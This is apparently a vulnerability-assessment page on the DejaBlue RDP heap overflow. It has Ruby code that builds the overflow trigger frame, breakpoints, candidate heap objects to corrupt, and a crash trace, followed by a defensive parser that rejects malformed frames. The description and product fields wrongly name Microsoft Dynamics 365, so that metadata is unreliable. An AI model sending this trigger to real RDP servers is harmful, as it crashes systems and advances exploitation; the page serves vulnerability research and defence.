DejaBlue, RDP Heap Overflow
Description
A remote code execution vulnerability exists in Microsoft Dynamics 365 for Finance and Operations (on-premises) version 10.0.11. An attacker who successfully exploited this vulnerability could gain remote code execution via server-side script execution on the victim server.
An authenticated attacker with privileges to import and export data could exploit this vulnerability by sending a specially crafted file to a vulnerable Dynamics server.
The security update addresses the vulnerability by correcting how Microsoft Dynamics 365 for Finance and Operations (on-premises) version 10.0.11 handles user input.
Ratings
- Attacker Value: Very High
- Exploitability: Medium
Technical Analysis
Analysis performed using `rdpcorets.dll` from Windows 8.1 x64 (sha256: c9d1f3c0a9459c67e96115041d622808decc31f9a9b7e3b4806421557f09cda1).

The vulnerability exists within `rdpcorets.dll`, loaded in the process `svchost.exe -k NetworkService` running as `NT AUTHORITY\NETWORK SERVICE`. This is started by the service "Remote Desktop Services".

The bug is triggered by sending a specially crafted request over the `drdynvc` channel, which must be set up first. Use the flags `RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP` when initializing it.

After the DynVC channel has been initialized, the overflow is triggered by sending a segmented data (`DYNVC_DATA_COMPRESSED`) frame, see MS-RDPEDYC:25 for details. Note that segmented data is different than a data segment.

The compressed frame includes a payload as defined in MS-RDPEGFX section 2.2.5. The below snippet can be used to build a compatible data segment. The RDP segmented data field contains a length field which is the root cause of the vulnerability.
```ruby
# see [MS-RDPEGFX] section 2.2.5.2
def build_rdp_data_segment(data)
  # RDP_DATA_SEGMENT: size (uint32, little-endian) counts the bulk header byte plus the payload
  encoded = [data.length + 1].pack("L<")
  encoded << "\x04"   # RDP8_BULK_ENCODED_DATA header byte
  encoded << data
end

def build_trigger
  # see [MS-RDPEGFX] section 2.2.5
  rdp_data_segment = build_rdp_data_segment(("\x41" * 0x50) + [0xdead1337dead1337].pack('Q'))
  # RDP_SEGMENTED_DATA: descriptor 0xE1 (MULTIPART), segmentCount 1, and an
  # uncompressedSize packed as a negative signed 32-bit value
  rdp_segmented_data = [0xe1, 1, 0x40 - 0x2000].pack("CS<l<") + rdp_data_segment
end
```
An object needs to be created and corrupted, potential candidates are below.
| Object Name | Breakpoint Address | Size | Can Create? |
|---|---|---|---|
| CRdpDynVCMgr ChannelInternal | rdpcorets+c8e03 | 0x138 | Static number can be created |
| DecompressRdp8 | rdpcorets+16274a | 0x68 | |
| DecompressUnchopper | rdpcorets+12dd1a | 0x48 | |
Relevant Breakpoints

- `rdpcorets+f67dc ".printf \"CRdpDynVCMgr::HandleIncomingDvcData\\n\"; db rdx"`
- `rdpcorets+1dcc89 ".printf \"memcpy(dst=%N, src=%N, size=%N)\\n\", rcx, rdx, r8; g"`: memcpy call that copies the buffer to the target and overflows it
- `rdpcorets+c9538 ".printf \"CRdpDynVC::Initialize\\n\"; g"`: watch object creation instances
- `msvcrt+1e00 ".printf \"operator new(size=%N)\", rcx; gu; .printf \" = %N\\n\", rax; g"`: watch object creation instances
Read Access Violation
The following stack trace was taken during a RAV after having corrupted an object using the target memcpy call.
```
0:001> g
(138c.13b4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
rdpcorets+0xd9d36:
00007fff`a5b79d36 49895014        mov     qword ptr [r8+14h],rdx ds:41414141`41414155=????????????????
0:033> k
Child-SP          RetAddr           Call Site
00000050`beaaf478 00007fff`a5b79c7f rdpcorets+0xd9d36
00000050`beaaf480 00007fff`a5b7c3bf rdpcorets+0xd9c7f
00000050`beaaf4c0 00007fff`a5b91190 rdpcorets+0xdc3bf
00000050`beaaf5f0 00007fff`a5b90cb1 rdpcorets+0xf1190
00000050`beaaf690 00007fff`a5bf2893 rdpcorets+0xf0cb1
00000050`beaaf720 00007fff`c9ed13d2 rdpcorets!DllGetClassObject+0x75b3
00000050`beaaf7e0 00007fff`caf654f4 KERNEL32!BaseThreadInitThunk+0x22
00000050`beaaf810 00000000`00000000 ntdll!RtlUserThreadStart+0x34
0:033> u
rdpcorets+0xd9d36:
00007fff`a5b79d36 49895014        mov     qword ptr [r8+14h],rdx
00007fff`a5b79d3a 498d5028        lea     rdx,[r8+28h]
00007fff`a5b79d3e 41c7401038000000 mov     dword ptr [r8+10h],38h
00007fff`a5b79d46 4d89481c        mov     qword ptr [r8+1Ch],r9
00007fff`a5b79d4a 45894824        mov     dword ptr [r8+24h],r9d
00007fff`a5b79d4e 8d0c8510000000  lea     ecx,[rax*4+10h]
00007fff`a5b79d55 4803ca          add     rcx,rdx
00007fff`a5b79d58 44890a          mov     dword ptr [rdx],r9d
0:033> r
rax=0000000000000000 rbx=00007fffa5b79d10 rcx=00000050bf0c1940
rdx=0000000000000001 rsi=00000050bdcba9a0 rdi=00000050bf0c1940
rip=00007fffa5b79d36 rsp=00000050beaaf478 rbp=00000050bf0c7450
 r8=4141414141414141  r9=0000000000000000 r10=0000000000000007
r11=00000050beaaf4b8 r12=00000050bf0c1f40 r13=00000050bf0c23c0
r14=0000000000000000 r15=00000050bdccfdc0
iopl=0         nv up ei pl zr na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
rdpcorets+0xd9d36:
00007fff`a5b79d36 49895014        mov     qword ptr [r8+14h],rdx ds:41414141`41414155=????????????????
```
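The following is an added example and not code from the assessment above: a strict parser for the RDP_SEGMENTED_DATA container laid out in [MS-RDPEGFX] section 2.2.5, written to show where the `uncompressedSize` and per-segment `size` fields can be checked against the bytes actually present before any buffer is sized from them, which is the consistency check the vulnerable length handling lacks. The `MAX_UNCOMPRESSED_SIZE` bound is an assumed local policy value, not one from the specification, and the sample frames are constructed for illustration rather than captured traffic.

```ruby
# Added example: a strict parser for RDP_SEGMENTED_DATA as laid out in
# [MS-RDPEGFX] 2.2.5.1 / 2.2.5.2. Not code from the assessment above.
#
#   RDP_SEGMENTED_DATA: descriptor (1 byte)
#     0xE0 SINGLE    -> followed directly by one RDP8_BULK_ENCODED_DATA
#     0xE1 MULTIPART -> segmentCount (uint16), uncompressedSize (uint32), segments
#   RDP_DATA_SEGMENT:   size (uint32), then `size` bytes of RDP8_BULK_ENCODED_DATA
#   RDP8_BULK_ENCODED_DATA: header (1 byte), data
#
# Every length field is validated against the bytes actually present and against
# a policy bound before it is used.

DESCRIPTOR_SINGLE     = 0xE0
DESCRIPTOR_MULTIPART  = 0xE1
PACKET_COMPRESSED     = 0x20                 # flag in the RDP8 bulk header byte
MAX_UNCOMPRESSED_SIZE = 16 * 1024 * 1024     # assumed local policy bound, not from the spec

class MalformedSegmentedData < StandardError; end

# Parse one RDP_DATA_SEGMENT starting at byte offset `off`.
# Returns [segment, offset_after_segment].
def parse_data_segment(buf, off)
  remaining = buf.bytesize - off
  raise MalformedSegmentedData, "segment size field truncated at offset #{off}" if remaining < 4
  size = buf.byteslice(off, 4).unpack1("L<")
  off += 4
  remaining -= 4
  raise MalformedSegmentedData, "segment size 0 leaves no room for the bulk header" if size < 1
  if size > remaining
    raise MalformedSegmentedData, "segment size #{size} exceeds the #{remaining} bytes actually present"
  end
  header = buf.getbyte(off)
  segment = {
    header: header,
    compressed: (header & PACKET_COMPRESSED) != 0,
    data: buf.byteslice(off + 1, size - 1)
  }
  [segment, off + size]
end

# Parse a whole RDP_SEGMENTED_DATA blob, raising MalformedSegmentedData on any
# inconsistency between the declared lengths and the bytes present.
def parse_segmented_data(buf)
  raise MalformedSegmentedData, "empty frame" if buf.nil? || buf.bytesize == 0
  descriptor = buf.getbyte(0)
  case descriptor
  when DESCRIPTOR_SINGLE
    raise MalformedSegmentedData, "SINGLE frame has no bulk header" if buf.bytesize < 2
    header = buf.getbyte(1)
    data = buf.byteslice(2, buf.bytesize - 2)
    { descriptor: :single, segment_count: 1, uncompressed_size: nil,
      segments: [{ header: header, compressed: (header & PACKET_COMPRESSED) != 0, data: data }] }
  when DESCRIPTOR_MULTIPART
    raise MalformedSegmentedData, "MULTIPART header truncated" if buf.bytesize < 7
    segment_count, uncompressed_size = buf.byteslice(1, 6).unpack("S<L<")
    raise MalformedSegmentedData, "segmentCount is 0" if segment_count == 0
    if uncompressed_size > MAX_UNCOMPRESSED_SIZE
      raise MalformedSegmentedData, "uncompressedSize #{uncompressed_size} exceeds policy bound #{MAX_UNCOMPRESSED_SIZE}"
    end
    off = 7
    segments = Array.new(segment_count) do
      seg, off = parse_data_segment(buf, off)
      seg
    end
    raise MalformedSegmentedData, "#{buf.bytesize - off} trailing bytes after last segment" if off != buf.bytesize
    # With no compressed segments the declared uncompressedSize must equal the
    # payload bytes present; a decompressor would enforce the same bound on its output.
    plain_bytes = segments.sum { |s| s[:data].bytesize }
    if segments.none? { |s| s[:compressed] } && plain_bytes != uncompressed_size
      raise MalformedSegmentedData, "uncompressedSize #{uncompressed_size} but #{plain_bytes} uncompressed bytes present"
    end
    { descriptor: :multipart, segment_count: segment_count,
      uncompressed_size: uncompressed_size, segments: segments }
  else
    raise MalformedSegmentedData, format("unknown descriptor 0x%02x", descriptor)
  end
end

# Convenience wrapper returning [:ok, parsed] or [:malformed, reason].
def check_segmented_data(buf)
  [:ok, parse_segmented_data(buf)]
rescue MalformedSegmentedData => e
  [:malformed, e.message]
end

# Constructed sample frames for illustration (not captured traffic).
GOOD_MULTIPART = [DESCRIPTOR_MULTIPART, 2, 8].pack("CS<L<") +
                 [5].pack("L<") + "\x04ABCD" +
                 [5].pack("L<") + "\x04EFGH"
# uncompressedSize packed as a negative signed value reads back as a huge unsigned length
BAD_UNCOMPRESSED_SIZE = [DESCRIPTOR_MULTIPART, 1, 0x40 - 0x2000].pack("CS<l<") +
                        [5].pack("L<") + "\x04ABCD"
# per-segment size claims far more bytes than the frame carries
BAD_SEGMENT_SIZE = [DESCRIPTOR_MULTIPART, 1, 4].pack("CS<L<") +
                   [0x1000].pack("L<") + "\x04ABCD"

if __FILE__ == $PROGRAM_NAME
  [GOOD_MULTIPART, BAD_UNCOMPRESSED_SIZE, BAD_SEGMENT_SIZE].each do |frame|
    verdict, detail = check_segmented_data(frame)
    puts "#{verdict}: #{verdict == :ok ? "#{detail[:segment_count]} segment(s)" : detail}"
  end
end
```

The parser rejects the frame shape described above on two independent grounds: the `uncompressedSize` that wraps to a value far beyond any sane bound, and any segment whose `size` field exceeds the bytes that actually follow it. Either check alone would stop a buffer from being sized by an attacker-controlled length.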
Ratings
- Attacker Value: Very High
Technical Analysis
Affects every version of Windows from Windows 7 to Windows 10. A DVC, or Dynamic Virtual Channel, packet needs to be sent with a specially-crafted uncompressed field value larger than an integer, causing an overflow, according to MalwareTech's writeup here: https://www.malwaretech.com/2019/08/dejablue-analyzing-a-rdp-heap-overflow.html
Ratings
- Attacker Value: High
- Exploitability: Low
Technical Analysis
This vulnerability was discovered while researchers audited the RDP code from the previous vulnerability, Bluekeep. This vulnerability is likely going to be worse than Bluekeep, as it targets more modern operating systems. The saving grace with Dejablue, as with Bluekeep and even Eternalblue, is the complexity of turning the vulnerability into a reliable exploit, as the attacker must successfully trigger the vulnerability, write to kernel memory and to user memory, then execute the code in kernel memory to locate and execute the code in user memory. Without question this is in the ability of nation states and probably even organized crime, but until a public version is released, this will be treated as a zero day by those attackers that possess it. I would be surprised to see a public version of this that works reliably across Windows kernel 10 releases for at least another six to eight weeks (October 2019).
Ratings
- Attacker Value: Very High
- Exploitability: Very High
Ratings
- Attacker Value: Very High
Ratings
- Attacker Value: Very High
- Exploitability: Low
Ratings
- Attacker Value: High
- Exploitability: Medium
General Information
Vendors
- microsoft
Products
- dynamics 365 for finance and operations 10.0.11
Do we have enough info here to perform a remote check for exploitable machines (is there a way to test without causing a crash)?
By causing a crash, yes. Without causing a crash, not that I am currently aware of. This is because the DynVC channel does not send meaningful responses to channel write requests, e.g. the server won’t respond that the channel write failed because the data was corrupted.
What might warrant further investigation would be the Server Error Reporting functionality as described in MS-RDPBCGR Section 3.3.5.7. From my limited testing, this wasn’t going to be feasible because bad writes to DynVC channels aren’t reported.